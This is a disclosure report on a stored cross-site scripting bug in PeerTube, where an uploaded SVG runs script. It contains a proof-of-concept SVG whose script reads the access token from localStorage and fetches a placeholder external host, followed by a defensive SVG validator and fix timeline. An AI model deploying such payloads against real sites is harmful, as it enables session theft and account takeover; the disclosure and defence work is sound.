Cross-site Scripting (XSS) - Stored in chocobozzz/peertube

Valid

Reported on

Sep 7th 2021


โœ๏ธ Description

We can upload an SVG image and then send its URL to other users. When they open the link, the script embedded in the SVG runs and we can obtain their complete session keys: the session keys are stored in local storage, so they can easily be read from JavaScript and stolen by attackers.

๐Ÿ•ต๏ธโ€โ™‚๏ธ Proof of Concept

1. Go to https://interact.projectdiscovery.io/, receive a URL, and put it in place of xxxxxxxxxxxxxxxxxxx.xxxxxxxxxx in image.SVG.

2. Upload the image.SVG file somewhere on the website, for example in the NEW CHANNEL section, and copy the link of the SVG image after the upload. It should look like this: blob:https://tube.s1gm4.eu/3d2c5059-114f-4664-a7f6-0f9a96f480c6

3. Open the URL and you can see the user's main access key (just for the test, I show one of the main local storage keys); you can also see that at https://interact.projectdiscovery.io/ we receive a ping from tube.s1gm4.eu.

//image.SVG

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
   xmlns:svg="http://www.w3.org/2000/svg"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:xlink="http://www.w3.org/1999/xlink"
   style="overflow: hidden; position: relative;"
   width="300"
   height="200">

  <image
     x="10"
     y="10"
     width="276"
     height="110"
     xlink:href="http://images.google.com/intl/es_ALL/images/logos/images_logo_lg.gif"
     stroke-width="1"
     id="image3204" />
  <rect
     x="0"
     y="150"
     height="10"
     width="300"
     style="fill: black"/>

<script type="text/javascript">
   const token = localStorage.getItem('access_token')
   alert(token);
   async function getUserInfo() {
     const response = await fetch('https://xxxxxxxxxxxxxxxxxxx.xxxxxxxxxx')
   }
   getUserInfo();
</script>
</svg>
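The payload above works because the SVG is opened under the site's own origin (a blob: URL created by a page carries that page's origin), so the embedded script can read localStorage like any first-party script. The defender-side check below is an added example written for this page; it is not PeerTube's code and is not the fix in commit 0ea2f7. It uses Python's standard xml.etree parser to walk an uploaded SVG and rejects anything that can run script: the script element used in the PoC, event-handler attributes, javascript:/data: URLs and foreignObject. It also flags external references such as the PoC image's http href, on the assumption that an avatar or channel image has no reason to load remote resources. The function names find_active_content and is_safe_svg, and the sample documents other than the trimmed PoC SVG, are assumptions constructed for this example.

```python
"""Server-side validation of uploaded SVG files (example for this report).

Rejects SVGs that carry active content before they are stored or served.
Assumed names: find_active_content(), is_safe_svg().
"""
import xml.etree.ElementTree as ET

# Elements that can execute script or embed arbitrary HTML inside an SVG.
ACTIVE_ELEMENTS = {"script", "foreignObject"}
# URL schemes that execute script or smuggle a nested document.
SCRIPT_SCHEMES = {"javascript", "data", "vbscript"}


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on qualified names."""
    return name.rsplit("}", 1)[-1]


def _url_scheme(value: str) -> str:
    """Return the lower-cased scheme of a URL, or '' for relative URLs.

    Whitespace and control characters are removed first: browsers ignore
    them inside a scheme, so "java\\nscript:" must still read as javascript.
    """
    compact = "".join(ch for ch in value if not ch.isspace() and ord(ch) > 31)
    compact = compact.lower()
    return compact.split(":", 1)[0] if ":" in compact else ""


def find_active_content(svg_text: str) -> list:
    """Return human-readable findings for an SVG document; empty means clean.

    xml.etree does not fetch external entities, but cap the upload size
    before calling this so oversized or entity-heavy files are refused early.
    """
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    for elem in root.iter():  # document order, root included
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in elem.attrib.items():
            lname = _local(attr)
            if lname.lower().startswith("on"):  # onload, onclick, onbegin, ...
                findings.append(f"event handler attribute {lname} on <{tag}>")
            if lname == "href":  # covers both href and xlink:href
                scheme = _url_scheme(value)
                if scheme in SCRIPT_SCHEMES:
                    findings.append(f"script-capable URL ({scheme}) in {lname} on <{tag}>")
                elif scheme in ("http", "https") or value.strip().startswith("//"):
                    findings.append(f"external reference ({scheme}) in {lname} on <{tag}>")
    return findings


def is_safe_svg(svg_text: str) -> bool:
    """True when the document contains none of the patterns above."""
    return not find_active_content(svg_text)


# Trimmed copy of the PoC SVG from this report (the exfiltration host is the
# reporter's placeholder, left as-is).
REPORTED_SVG = """<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="300" height="200">
  <image x="10" y="10" width="276" height="110"
     xlink:href="http://images.google.com/intl/es_ALL/images/logos/images_logo_lg.gif" />
  <script type="text/javascript">
    const token = localStorage.getItem('access_token')
    async function getUserInfo() {
      const response = await fetch('https://xxxxxxxxxxxxxxxxxxx.xxxxxxxxxx')
    }
    getUserInfo();
  </script>
</svg>
"""

# Constructed clean sample: shapes and a fragment link only.
CLEAN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <rect width="10" height="10" style="fill:black"/>
  <a href="#top"><circle r="2"/></a>
</svg>
"""

# Constructed sample with an event-handler attribute and no script element.
HANDLER_SVG = '<svg xmlns="http://www.w3.org/2000/svg" onload="x()"/>'


if __name__ == "__main__":
    for name, doc in (("reported", REPORTED_SVG), ("clean", CLEAN_SVG), ("handler", HANDLER_SVG)):
        print(name, "->", "accept" if is_safe_svg(doc) else f"reject {find_active_content(doc)}")
```

Rejecting the upload is only one layer; the same class of bug is also contained by serving user-supplied files from a separate origin (or with a sandboxing Content-Security-Policy and Content-Disposition: attachment) and by keeping session tokens out of localStorage, where any same-origin script can read them.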

💥 Impact

This vulnerability can be used to take control of user accounts.

Occurrences

We have contacted a member of the chocobozzz/peertube team and are waiting to hear back 2 years ago
chocobozzz validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
chocobozzz marked this as fixed with commit 0ea2f7 2 years ago
chocobozzz has been awarded the fix bounty
This vulnerability will not receive a CVE
Jamie Slome
2 years ago

Admin


CVE published! 🎊

CVE-2021-3780
